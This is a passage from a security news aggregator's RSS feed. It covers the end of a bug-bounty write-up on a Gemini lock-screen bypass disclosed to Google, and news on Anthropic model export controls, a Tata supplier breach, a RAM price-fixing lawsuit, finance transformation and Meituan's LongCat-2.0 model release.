Timeline</h3><p>Throughout the lifecycle of this vulnerability, I maintained an active and transparent line of communication with Google’s security team. Shortly after submission, my report was designated as a <strong>“Duplicate,”</strong> tied to an older legacy issue inherent to Android’s core component architecture. Despite my requests for verification regarding the unique interaction vector, the root cause was maintained as identical.</p><p>Nevertheless, I continued my research. Following a subsequent major Gemini update, I verified that the exploit remained active. Upon presenting this evidence, an immediate mitigation was deployed, removing the specific mode buttons from the locked interface. Roughly a month later, a comprehensive patch was pushed, completely resolving the underlying logic flaw. My subsequent regression testing confirmed that unauthorized multi-touch access had been completely mitigated, successfully concluding the lifecycle of the report.</p><h3>Key Takeaways and Conclusion</h3><p>This journey marked my very first experience within the bug bounty ecosystem. Uncovering this logical vulnerability taught me that security research extends far beyond hunting for code flaws; it is about navigating the disclosure process and understanding how even a “duplicate” report can be leveraged to harden a system’s overall security posture. It perfectly illustrated how seemingly decoupled, non-critical components can be chained together to form a high-severity exploit.</p><p>Analyzing Android’s security architecture and engaging with engineering teams on regression analysis during my first research attempt fundamentally shifted my perspective on information security. While this specific report did not yield a financial bounty, the true payout was invaluable: a deep dive into the inner workings of complex enterprise software and the discipline required to execute a responsible disclosure process.</p><p>This experience is merely the opening chapter of my career in security research. It stands as a reminder that no architecture is infallible, but through the vigilance of independent researchers, they can be made resilient. Security is never a static defense; it is a continuous cycle of curiosity, analysis, and refinement.</p><p><strong>NOTE:</strong> All PoC media provided in this article have been redacted to ensure user privacy and are presented solely for educational and security analysis purposes.</p><h3>📌 References &amp; Community</h3><p>If you want to check out my other security research, tools, or open-source projects, feel free to explore the links below:</p><ul><li><strong>GitHub:</strong> <a href="https://github.com/msalihberk/">github.com/msalihberk</a></li><li><strong>Previous Research:</strong> <a href="https://medium.com/meetcyber/shadowlab-a-modular-c2-framework-architecture-built-with-python-for-modern-cybersecurity-research-7acb496e6784">ShadowLab: A Modular C2 Framework Architecture Built with Python for Modern Cybersecurity Research</a></li><li><strong>Follow for More:</strong> Feel free to follow my Medium profile to get notified about my future security research, development projects, and technical write-ups.</li></ul><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=9e7da290ea06" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/gemini-app-logical-lockscreen-bypass-9e7da290ea06">Is the Android Lock Screen an Illusion? A Critical Logical Bypass Discovered in the Gemini App</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Anthropic deploys Claude Sonnet 5, Fable and Mythos restored]]></title>
<description><![CDATA[Anthropic has launched Claude Sonnet 5 and restored access to its Fable and Mythos frontier models following a federal export control review. The decision marks the conclusion of an eighteen-day operational pause triggered by a US government export control directive on June 12, which forced the t...]]></description>
<link>https://tsecurity.de/de/3637888/ai-nachrichten/anthropic-deploys-claude-sonnet-5-fable-and-mythos-restored/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3637888/ai-nachrichten/anthropic-deploys-claude-sonnet-5-fable-and-mythos-restored/</guid>
<pubDate>Wed, 01 Jul 2026 10:48:44 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Anthropic has launched Claude Sonnet 5 and restored access to its Fable and Mythos frontier models following a federal export control review. The decision marks the conclusion of an eighteen-day operational pause triggered by a US government export control directive on June 12, which forced the temporary suspension of Anthropic’s highest-capability systems. Government officials enacted […]</p>
<p>The post <a href="https://www.artificialintelligence-news.com/news/anthropic-deploys-claude-sonnet-5-fable-and-mythos-restored/">Anthropic deploys Claude Sonnet 5, Fable and Mythos restored</a> appeared first on <a href="https://www.artificialintelligence-news.com/">AI News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Trump Drops Restrictions On Anthropic's Mythos and Fable Models]]></title>
<description><![CDATA[The Trump administration has lifted export restrictions that forced Anthropic to shut off public access to its Mythos and Fable models. After weeks of talks, Secretary of Commerce Howard Lutnick said Anthropic "has agreed to proactively detect and address security risks associated with the models...]]></description>
<link>https://tsecurity.de/de/3637547/it-security-nachrichten/trump-drops-restrictions-on-anthropics-mythos-and-fable-models/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3637547/it-security-nachrichten/trump-drops-restrictions-on-anthropics-mythos-and-fable-models/</guid>
<pubDate>Wed, 01 Jul 2026 08:07:16 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The Trump administration has lifted export restrictions that forced Anthropic to shut off public access to its Mythos and Fable models. After weeks of talks, Secretary of Commerce Howard Lutnick said Anthropic "has agreed to proactively detect and address security risks associated with the models; to work diligently with the U.S. government on protocols and standards and releases for Mythos, Fable and future models; and to inform the US government of any malicious activity." Access is set to begin returning July 1. TechCrunch reports: Anthropic had already publicly pledged to do much of this voluntarily, months before the export rule existed. That's part of why cybersecurity experts were skeptical of the restrictions in the first place. To them, the ban looked less like a security fix and more like leverage, a way for the Trump administration to punish Anthropic for its executives' public criticism of how the government, and the president's political opponents, might use the technology.
 
Mythos was originally made available to a select group of organizations beginning in April to allay concerns about its ability to identify and exploit vulnerabilities in software, while a version called Fable was released to the public in June with additional security guardrails. However, with Asian AI companies beginning to release their own AI models approaching Mythos-level capabilities -- among them Fugu and Tulonfeng -- the US government was under pressure to ease its restrictions on Anthropic to ensure that American AI could compete globally.
 
Last week, Lutnick cleared Mythos to be released to select customers approved by the White House. OpenAI's latest models were also released to a group of organizations approved by the Trump team, instead of the public. The Trump administration's erratic approach to AI policymaking has left companies across the industry with little clarity about what will govern future model releases. An executive order issued in June that signaled a desire to review models ahead of release was criticized by influential analysts like Dean W. Ball, who recently started a policy position at OpenAI.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Trump+Drops+Restrictions+On+Anthropic's+Mythos+and+Fable+Models%3A+https%3A%2F%2Fyro.slashdot.org%2Fstory%2F26%2F07%2F01%2F0545222%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fyro.slashdot.org%2Fstory%2F26%2F07%2F01%2F0545222%2Ftrump-drops-restrictions-on-anthropics-mythos-and-fable-models%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://yro.slashdot.org/story/26/07/01/0545222/trump-drops-restrictions-on-anthropics-mythos-and-fable-models?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Anthropic: US has lifted export controls on Fable and Mythos AI models after security risk fears]]></title>
<description><![CDATA[The AI company was forced earlier this month to suspend access to its Fable 5 and Mythos 5 models for all foreign nationalsAnthropic has said the US commerce department has lifted export controls on its Fable and Mythos AI models, less than ⁠three weeks after ⁠the company ​was ordered to suspend ...]]></description>
<link>https://tsecurity.de/de/3637233/ai-nachrichten/anthropic-us-has-lifted-export-controls-on-fable-and-mythos-ai-models-after-security-risk-fears/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3637233/ai-nachrichten/anthropic-us-has-lifted-export-controls-on-fable-and-mythos-ai-models-after-security-risk-fears/</guid>
<pubDate>Wed, 01 Jul 2026 04:03:20 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The AI company was forced earlier this month to suspend access to its Fable 5 and Mythos 5 models for all foreign nationals</p><p>Anthropic has said the US commerce department has lifted export controls on its Fable and Mythos AI models, less than ⁠three weeks after ⁠the company ​was ordered to suspend access to its most advanced AI models over national security risks.</p><p>“We’ll begin restoring access tomorrow,” Anthropic said in a statement on X late on Tuesday.</p> <a href="https://www.theguardian.com/technology/2026/jul/01/anthropic-fable-mythos-ai-models-us-export-controls-lifted">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[From ISP to DNS and VPNs: Rightsholders must be liable for collateral damage in piracy blocking, European ISP group says]]></title>
<description><![CDATA[EuroISPA has submitted a formal complaint to the European Commission, warning that aggressive anti-piracy blocking is causing massive collateral damage and urging liability for copyright holders when innocent sites are forced offline.]]></description>
<link>https://tsecurity.de/de/3636275/it-nachrichten/from-isp-to-dns-and-vpns-rightsholders-must-be-liable-for-collateral-damage-in-piracy-blocking-european-isp-group-says/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3636275/it-nachrichten/from-isp-to-dns-and-vpns-rightsholders-must-be-liable-for-collateral-damage-in-piracy-blocking-european-isp-group-says/</guid>
<pubDate>Tue, 30 Jun 2026 18:32:43 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[EuroISPA has submitted a formal complaint to the European Commission, warning that aggressive anti-piracy blocking is causing massive collateral damage and urging liability for copyright holders when innocent sites are forced offline.]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple Investigates iPhone 18 Pro Supplier Secrets Leaked By Tata]]></title>
<description><![CDATA[Apple is dealing with a major security headache after its manufacturing partner in India suffered a massive hack. A ransomware group called World Leaks recently posted a huge collection of stolen files on the dark web, and the initial Tata cyberattack involving a 630GB data breach is now exposing...]]></description>
<link>https://tsecurity.de/de/3635616/ios-mac-os/apple-investigates-iphone-18-pro-supplier-secrets-leaked-by-tata/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3635616/ios-mac-os/apple-investigates-iphone-18-pro-supplier-secrets-leaked-by-tata/</guid>
<pubDate>Tue, 30 Jun 2026 14:39:30 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple is dealing with a major security headache after its manufacturing partner in India suffered a massive hack. A ransomware group called World Leaks recently posted a huge collection of stolen files on the dark web, and the initial Tata cyberattack involving a 630GB data breach is now exposing deeply guarded secrets.



The tech brand is reportedly very worried because the dump includes specific component lists, vendor maps, and early test photos of its unreleased mobile devices.



Hackers expose secret parts suppliers and early phone test photos



According to reviewed documents, the leak contains at least six files that map specific components of the upcoming iPhone 18 Pro to exact suppliers. This includes details on main circuit board chips, battery parts, and camera hardware. The phone maker closely guards this kind of information. It never shares exact vendor maps in its public databases because that data reveals its bargaining power and potential weak spots to competitors.



The leak also includes photos of drop tests taken at a Tata facility in early 2026. These pictures reportedly show a grey phone with a triple camera setup on the back. While it might look similar to the current iPhone 17 Pro, seeing actual test units this far ahead of a planned September launch is incredibly rare and damaging to the secretive product cycle.



The company works to secure systems while investigating the breach



Following the incident, Tata quickly restricted internal access to its sensitive computer systems. The supplier also hired a global consulting group to perform a deep forensic audit and figure out exactly how the hackers got in. Behind the scenes, Apple is helping Tata Electronics fix security to prevent another disaster. The tech giant wants to make sure its partner locks down its network for the long term.



This whole situation comes at a tricky time. The industry is facing higher costs for memory chips, which have already forced price hikes for iPads and MacBooks. With its exact supplier deals now out in the open, the brand might face a harder time negotiating prices for future parts. Right now, neither business has made a public comment on the specific phone files found on the dark web.]]></content:encoded>
</item>
<item>
<title><![CDATA[Memory Giants Sued for Allegedly Fixing RAM Prices to Boost Profits]]></title>
<description><![CDATA[The three companies that make nearly all the world’s memory chips are facing a new class-action lawsuit in the United States. Samsung, SK Hynix, and Micron stand accused of working together to shrink the supply of standard memory to drive prices through the roof. This lawsuit, filed in a Californ...]]></description>
<link>https://tsecurity.de/de/3635615/ios-mac-os/memory-giants-sued-for-allegedly-fixing-ram-prices-to-boost-profits/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3635615/ios-mac-os/memory-giants-sued-for-allegedly-fixing-ram-prices-to-boost-profits/</guid>
<pubDate>Tue, 30 Jun 2026 14:39:29 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The three companies that make nearly all the world’s memory chips are facing a new class-action lawsuit in the United States. Samsung, SK Hynix, and Micron stand accused of working together to shrink the supply of standard memory to drive prices through the roof. This lawsuit, filed in a California federal court, claims these actions have forced everyday people and businesses to pay much more for their electronics.



Chipmakers accused of shifting production to favor expensive AI memory



The lawsuit argues that these three giants—which control roughly 90% of the global market—coordinated a shift in their manufacturing focus. Instead of keeping up with the demand for standard DDR3 and DDR4 RAM used in your daily Mac and iPad devices, the chipmakers allegedly moved their production capacity toward high-bandwidth memory (HBM). This specialized memory is primarily used for AI data centers, which are willing to pay much higher prices.



By limiting the supply of consumer-grade chips, the plaintiffs claim the trio effectively created an artificial shortage. They argue that in a healthy market, rising prices would normally lead companies to increase production to grab more customers. Instead, this lawsuit alleges that the three companies kept supply tight to maintain high profit margins, leading to what some are calling a memory price crisis that has hit Apple and other tech makers hard.



Consumers bear the cost as hardware prices hit historic highs



This move has had a direct impact on the gadgets we use every day. As supply dwindled, the cost of manufacturing consumer electronics skyrocketed. Because these components are essential for everything from laptops to gaming consoles, companies have been forced to pass those costs onto you. We have already seen the effects, as Apple's iPhone 18 Pro memory costs reportedly increase fivefold for the tech maker, triggering price hikes across its entire lineup.



While the companies involved have generally denied any wrongdoing, this is not the first time they have faced such accusations. The current complaint points to their history in the early 2000s, when Samsung and SK Hynix were found guilty of price-fixing and paid hundreds of millions in fines.



Whether or not this new case succeeds, the reality remains that as long as these three firms control the vast majority of production, the market for memory will stay extremely tight and expensive for everyone.]]></content:encoded>
</item>
<item>
<title><![CDATA[Live on the first floor while building the second]]></title>
<description><![CDATA[Every finance transformation conversation we have these days starts with AI. Clients arrive at the table with a list of agentic capabilities they want to deploy and an assumption that technology is the answer.



That assumption is half right. AI is one of the most consequential forces reshaping ...]]></description>
<link>https://tsecurity.de/de/3635185/it-nachrichten/live-on-the-first-floor-while-building-the-second/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3635185/it-nachrichten/live-on-the-first-floor-while-building-the-second/</guid>
<pubDate>Tue, 30 Jun 2026 12:17:46 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Every finance transformation conversation we have these days starts with AI. Clients arrive at the table with a list of agentic capabilities they want to deploy and an assumption that technology is the answer.</p>



<p>That assumption is half right. AI is one of the most consequential forces reshaping finance in a generation, and the future-state operating models we are designing today look fundamentally different as a result. <a href="https://www.crosscountry-consulting.com/insights/blog/the-defining-leadership-moment-why-cfos-must-own-ai-strategy/" rel="nofollow">But AI alone is not a strategic finance roadmap</a>. The return comes from sequencing AI with the right process redesign, technology architecture and data foundation, with each piece compounding the next.</p>



<p>For decades, CFOs treated transformation like a renovation, managing tasks room by room. They executed separate projects to update the close, replace an ERP and layer better reporting on the same operating model. AI changes that blueprint. For the first time, we can take the house down to the studs and rebuild around capabilities that did not exist three years ago. That is a different kind of project, and it requires a different kind of leader.</p>



<p>AI has done something that previous waves of transformation never managed to do. It has brought the right stakeholders into the conversation and forced finance and IT to address the same problem simultaneously. That side effect alone is reshaping how the next phase of transformation gets built.</p>



<p>This is the part of the conversation IT leaders need to understand.</p>



<h2 class="wp-block-heading">What the AI conversation has actually done</h2>



<p>For most of the last decade, finance transformation was launched in response to a single trigger. A cost-out program. A post-acquisition integration. An ERP that aged out. The CFO owned the initiative, the CIO got pulled in to handle the technology and the rest of the business found out when the new system went live.</p>



<p>The AI moment has changed that pattern and forced a new conversation. When you are taking the house down to the studs rather than swapping out fixtures, the work cannot be done by Finance or IT alone. <a href="https://www.crosscountry-consulting.com/enterprise-digital-transformation-study/" rel="nofollow">Stakeholder alignment becomes a precondition for the rebuild</a>, not a nice-to-have. AI is the attraction that pulls everyone into the room.</p>



<p>When a client walks in asking about agentic finance, the CFO, CIO and heads of accounting, FP&amp;A and controllership all show up for the same assessment. Leaders who have historically run parallel agendas now talk about the same problem at the same time. By the time we get to solution design, the cross-functional alignment that used to require months has already happened. Issues get raised early. The transformation moves faster because everyone agreed on the destination before we picked the route.</p>



<p>Maybe we can thank AI for bringing people together who otherwise wouldn’t have been collaborating. That is the reason the next phase of finance transformation looks structurally different from the last.</p>



<h2 class="wp-block-heading">The roadmap and what’s missing</h2>



<p>A strategic finance roadmap is not a project plan. It is more like an architect’s drawings, providing a multi-year design that connects business strategy to a future-state operating model, sequenced so each step compounds rather than starts over.</p>



<p>Every roadmap has a North Star. That future-state vision almost always has an AI component. A multi-agent solution orchestrated on a platform. Continuous close. Predictive FP&amp;A. Real-time controls. Humans in the Loop. A streamlined org chart. That vision, eventually, becomes the destination.</p>



<p>But the destination is not today. What matters today is that the work between the as-is and future-state is cumulative, not throwaway. The data foundation organized for one transformation becomes the foundation for the next. Process improvements made now will accelerate the AI capabilities deployed two years from now.</p>



<p>You do not need an architect for a renovation. You hire a contractor, hand them a task list and inspect the results. You need an architect when you take the house down to the studs. The role most transformation programs are missing right now is not another builder. There are plenty of developers, system implementers and business integrators in any given program. What is missing is the architect.</p>



<p>The architect designs how the parts come together before anyone starts building. That work runs side by side with the client, connecting the dots between the technology, the problems, the data and the functions inside Finance and IT. The architect’s job is to create the vision and the blueprint and to translate between groups that do not naturally speak the same language. Done well, the result is a structure that is fundamentally sound and built to expand as the client’s appetite grows. Done poorly or skipped, the result is a house that cannot accommodate what comes next.</p>



<h2 class="wp-block-heading">Live on the 1st floor while you build the 2nd… and 3rd</h2>



<p>The traditional transformation pitch promises ROI at the end. Wait three years and the numbers will look great. That pitch is structurally fragile, and every CIO who has watched a transformation <a href="https://www.mckinsey.com/capabilities/mckinsey-digital/our-insights/agile-in-enterprise-resource-planning-a-myth-no-more" rel="nofollow">budget get cut in year two knows why</a>.</p>



<p>Stakeholder fatigue is real. Budget uncertainty is real. In private equity-backed companies, the three-to-five-year hold period is real. Any program that has not produced measurable value in the first phase loses political support before the second phase is built.</p>



<p>The architectural alternative is to design the program so the first floor is occupied while the second and third floors are still being completed. The first process redesign produces value while the next is being scoped. The first technology deployment generates a return while the next is being implemented. The roadmap is not a march toward a distant payoff. It is a sequence of compounding wins.</p>



<p>The materiality of the return matters more than the size. A small process improvement or quick win that delivers a meaningful percentage gain in week ten is worth more than a large transformation that promises a bigger gain in year three. Quick wins prove that the blueprint is working. That proof builds the confidence stakeholders need to fund the next phase and the one after that. Investors want immediate ROI. Boards want immediate ROI. The strategic finance roadmap should be designed to deliver it.</p>



<h2 class="wp-block-heading">Data in every room</h2>



<p>Picture data as the electricity and water in a building: every room needs it, and the pipes and wires that carry it are what make the structure livable. Consolidating, warehousing and improving data quality is how you run those lines. It strengthens every element of the roadmap, not just the AI.</p>



<p>That has implications for how the stack gets selected. Most clients end up with an ecosystem rather than a single platform. ERP, EPM, close management, procurement, reporting and an emerging set of agentic capabilities, all integrated against a shared data foundation. The boundaries between those tools matter less than the data architecture that connects them.</p>



<p>It also has implications for what the CIO needs to be doing right now, even on transformations not yet formally launched. The data work pays dividends regardless of which solutions eventually get built. Cybersecurity, controls and business continuity are not bolted on at the end. They are design constraints embedded in the architecture from day one. SOX compliance is easier to build in than to retrofit, as is every other control discipline that lands on the CIO’s desk.</p>



<h2 class="wp-block-heading">The roadmap in 5 years</h2>



<p>The most concrete way to think about where this is going is to look at the org chart.</p>



<p>The finance org chart five years from now is not going to look like the org chart today. Where there used to be five controllers, there may be one human controller and three E-controllers, with agents sitting alongside them on the chart. The remaining human roles will be split between onshore and offshore in ways that look unfamiliar from where we sit now. The balance and location of every component will shift.</p>



<p>The strategic finance roadmap is the artifact that builds toward that end state, and the roadmap itself will evolve as the work progresses. Not a destination, but a continuous design exercise.</p>



<p>AI is rebuilding finance from the studs up. The strategic finance roadmap is how we make sure the new house is structurally sound, produces returns from the first floor and reflects the vision and the priorities of the people who will live in it. That work belongs to the CFO and the CIO together, or it does not become livable.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.cio.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Meituan open sources LongCat-2.0, the 1.6T, near-frontier agentic coding model that's been leading OpenRouter — trained entirely on Chinese chips]]></title>
<description><![CDATA[A few hours ago, Chinese delivery app company Meituan officially unveiled LongCat-2.0 on GitHub, Hugging Face, and its native platform, unmasking the model as the computational engine behind "Owl Alpha," the anonymous stealth model that has spent the last two months commanding global developer ch...]]></description>
<link>https://tsecurity.de/de/3634858/it-nachrichten/meituan-open-sources-longcat-20-the-16t-near-frontier-agentic-coding-model-thats-been-leading-openrouter-trained-entirely-on-chinese-chips/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3634858/it-nachrichten/meituan-open-sources-longcat-20-the-16t-near-frontier-agentic-coding-model-thats-been-leading-openrouter-trained-entirely-on-chinese-chips/</guid>
<pubDate>Tue, 30 Jun 2026 09:47:52 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A few hours ago, Chinese delivery app company <a href="https://longcat.chat/blog/longcat-2.0/">Meituan officially unveiled LongCat-2.0 </a>on <a href="https://github.com/meituan-longcat/LongCat-2.0">GitHub</a>, <a href="https://huggingface.co/meituan-longcat/LongCat-2.0/blob/main/LICENSE">Hugging Face</a>, and its native platform, unmasking the model as the computational engine behind "Owl Alpha," the anonymous stealth model that has spent the last two months commanding global developer charts on OpenRouter. </p><p>Developed to fundamentally disrupt closed-source enterprise dominance in autonomous software engineering, the 1.6-trillion-parameter Mixture-of-Experts (MoE) system brings a native 1-million-token context window to the public domain under a highly permissive, enterprise grade, commercially viable MIT license. </p><p>Commercial access to the architecture introduces a highly aggressive pricing tier, deploying a mechanism where all context-cache hits are processed completely<i> free of charge</i>, running alongside a time-limited "<a href="https://longcat.chat/platform/docs/TokenPack.html">Token Pack</a>" flash-sale paradigm. There's also a typical <a href="https://longcat.chat/platform/docs/APIPayAsYouGo.html">"pay-as-you-go" API</a> for non-cache hits standard priced at $0.75/$2.95 per million tokens in/out.</p><p>However, a limited-time promotional discount aggressively slashes these operational expenditures down to $0.30 per million tokens for uncached input and $1.20 per million tokens for output, both on the cheaper-end of top performing models globally. </p><table><tbody><tr><td><p><b>Model</b></p></td><td><p><b>Input ($/1M)</b></p></td><td><p><b>Output ($/1M)</b></p></td><td><p><b>Total ($/1M)</b></p></td><td><p><b>Source</b></p></td></tr><tr><td><p>MiMo-V2.5 Flash</p></td><td><p>$0.10</p></td><td><p>$0.30</p></td><td><p>$0.40</p></td><td><p><a href="https://platform.xiaomimimo.com/docs/en-US/pricing">Xiaomi</a></p></td></tr><tr><td><p>deepseek-v4-flash</p></td><td><p>$0.14</p></td><td><p>$0.28</p></td><td><p>$0.42</p></td><td><p><a href="https://api-docs.deepseek.com/quick_start/pricing">DeepSeek</a></p></td></tr><tr><td><p>deepseek-v4-pro</p></td><td><p>$0.435</p></td><td><p>$0.87</p></td><td><p>$1.305</p></td><td><p><a href="https://api-docs.deepseek.com/quick_start/pricing">DeepSeek</a></p></td></tr><tr><td><p>MiniMax-M3</p></td><td><p>$0.30</p></td><td><p>$1.20</p></td><td><p>$1.50</p></td><td><p><a href="https://platform.minimax.io/subscribe/token-plan?tab=api-enterprise">MiniMax</a></p></td></tr><tr><td><p><b>LongCat-2.0 — limited-time promo</b></p></td><td><p><b>$0.30</b></p></td><td><p><b>$1.20</b></p></td><td><p><b>$1.50</b></p></td><td><p><b></b><a href="https://longcat.chat/platform/docs/APIPayAsYouGo.html"><b>LongCat</b></a><b></b></p></td></tr><tr><td><p>Gemini 3.1 Flash-Lite</p></td><td><p>$0.25</p></td><td><p>$1.50</p></td><td><p>$1.75</p></td><td><p><a href="https://ai.google.dev/gemini-api/docs/pricing">Google</a></p></td></tr><tr><td><p>Qwen3.7-Plus</p></td><td><p>$0.40</p></td><td><p>$1.60</p></td><td><p>$2.00</p></td><td><p><a href="https://modelstudio.console.alibabacloud.com/ap-southeast-1?tab=doc#/doc/?type=model&amp;url=2840914_2&amp;modelId=qwen3.7-plus&amp;serviceSite=international">Alibaba Cloud</a></p></td></tr><tr><td><p>MiMo-V2.5</p></td><td><p>$0.40</p></td><td><p>$2.00</p></td><td><p>$2.40</p></td><td><p><a href="https://platform.xiaomimimo.com/docs/en-US/pricing">Xiaomi</a></p></td></tr><tr><td><p><b>LongCat-2.0 — standard</b></p></td><td><p><b>$0.75</b></p></td><td><p><b>$2.95</b></p></td><td><p><b>$3.70</b></p></td><td><p><b></b><a href="https://longcat.chat/platform/docs/APIPayAsYouGo.html"><b>LongCat</b></a></p></td></tr><tr><td><p>Grok 4.3 (low context)</p></td><td><p>$1.25</p></td><td><p>$2.50</p></td><td><p>$3.75</p></td><td><p><a href="https://docs.x.ai/developers/models/grok-4.3">xAI</a></p></td></tr><tr><td><p>MiMo-V2.5 Pro (≤256K)</p></td><td><p>$1.00</p></td><td><p>$3.00</p></td><td><p>$4.00</p></td><td><p><a href="https://platform.xiaomimimo.com/docs/en-US/pricing">Xiaomi</a></p></td></tr><tr><td><p>Kimi-K2.6</p></td><td><p>$0.95</p></td><td><p>$4.00</p></td><td><p>$4.95</p></td><td><p><a href="https://platform.kimi.ai/docs/pricing/chat-k26">Moonshot AI</a></p></td></tr><tr><td><p>GLM-5.2</p></td><td><p>$1.40</p></td><td><p>$4.40</p></td><td><p>$5.80</p></td><td><p><a href="https://docs.z.ai/guides/overview/pricing">Z.ai</a></p></td></tr><tr><td><p>GPT-5.6 Luna</p></td><td><p>$1.00</p></td><td><p>$6.00</p></td><td><p>$7.00</p></td><td><p><a href="https://openai.com/index/previewing-gpt-5-6-sol/">OpenAI</a></p></td></tr><tr><td><p>Grok 4.3 (high context)</p></td><td><p>$2.50</p></td><td><p>$5.00</p></td><td><p>$7.50</p></td><td><p><a href="https://docs.x.ai/developers/models/grok-4.3">xAI</a></p></td></tr><tr><td><p>MiMo-V2.5 Pro (&gt;256K)</p></td><td><p>$2.00</p></td><td><p>$6.00</p></td><td><p>$8.00</p></td><td><p><a href="https://platform.xiaomimimo.com/docs/en-US/pricing">Xiaomi</a></p></td></tr><tr><td><p>Qwen3.7-Max</p></td><td><p>$2.50</p></td><td><p>$7.50</p></td><td><p>$10.00</p></td><td><p><a href="https://modelstudio.console.alibabacloud.com/ap-southeast-1?tab=doc#/doc/?type=model&amp;url=2840914_2&amp;modelId=qwen3.7-max&amp;serviceSite=international">Alibaba Cloud</a></p></td></tr><tr><td><p>Gemini 3.5 Flash</p></td><td><p>$1.50</p></td><td><p>$9.00</p></td><td><p>$10.50</p></td><td><p><a href="https://ai.google.dev/gemini-api/docs/pricing">Google</a></p></td></tr><tr><td><p>Gemini 3.1 Pro Preview (≤200K)</p></td><td><p>$2.00</p></td><td><p>$12.00</p></td><td><p>$14.00</p></td><td><p><a href="https://ai.google.dev/gemini-api/docs/pricing">Google</a></p></td></tr><tr><td><p>GPT-5.6 Terra</p></td><td><p>$2.50</p></td><td><p>$15.00</p></td><td><p>$17.50</p></td><td><p><a href="https://openai.com/index/previewing-gpt-5-6-sol/">OpenAI</a></p></td></tr><tr><td><p>GPT-5.4</p></td><td><p>$2.50</p></td><td><p>$15.00</p></td><td><p>$17.50</p></td><td><p><a href="https://openai.com/api/pricing/">OpenAI</a></p></td></tr><tr><td><p>Gemini 3.1 Pro Preview (&gt;200K)</p></td><td><p>$4.00</p></td><td><p>$18.00</p></td><td><p>$22.00</p></td><td><p><a href="https://ai.google.dev/gemini-api/docs/pricing">Google</a></p></td></tr><tr><td><p>Claude Opus 4.8</p></td><td><p>$5.00</p></td><td><p>$25.00</p></td><td><p>$30.00</p></td><td><p><a href="https://platform.claude.com/docs/en/about-claude/pricing">Anthropic</a></p></td></tr><tr><td><p>GPT-5.5</p></td><td><p>$5.00</p></td><td><p>$30.00</p></td><td><p>$35.00</p></td><td><p><a href="https://openai.com/api/pricing/">OpenAI</a></p></td></tr><tr><td><p>GPT-5.5 Instant (chat-latest)</p></td><td><p>$5.00</p></td><td><p>$30.00</p></td><td><p>$35.00</p></td><td><p><a href="https://developers.openai.com/api/docs/models/chat-latest">OpenAI</a></p></td></tr><tr><td><p>Sakana Fugu Ultra (≤272K)</p></td><td><p>$5.00</p></td><td><p>$30.00</p></td><td><p>$35.00</p></td><td><p><a href="https://console.sakana.ai/pricing#subscription-plan">Sakana AI</a></p></td></tr><tr><td><p>GPT-5.6 Sol</p></td><td><p>$5.00</p></td><td><p>$30.00</p></td><td><p>$35.00</p></td><td><p><a href="https://openai.com/index/previewing-gpt-5-6-sol/">OpenAI</a></p></td></tr><tr><td><p>Claude Fable 5 / Claude Mythos 5</p></td><td><p>$10.00</p></td><td><p>$50.00</p></td><td><p>$60.00</p></td><td><p><a href="https://platform.claude.com/docs/en/about-claude/models/overview">Anthropic</a></p></td></tr></tbody></table><p>What makes the release a definitive inflection point for global tech infrastructure is its operational independence: the massive model was trained entirely on a cluster of over 50,000 domestic Chinese Application-Specific Integrated Circuits (ASICs), proving that near-frontier AI models can be scaled successfully without relying on the typical U.S. Nvidia GPUs that have, to date, powered much of the global generative AI frontier model training effort. </p><p>This successful deployment of alternative silicon signals a profound structural shift. If Chinese conglomerates can consistently iterate trillion-parameter architectures using homegrown ASICs rather than general-purpose GPUs, it would seem to threaten Nvidia's dominance in this sector. </p><p>Crucially, this technological pivot arrives precisely as Washington pressures top-tier American labs to restrict access to their latest models. Following a U.S. governmental request,<a 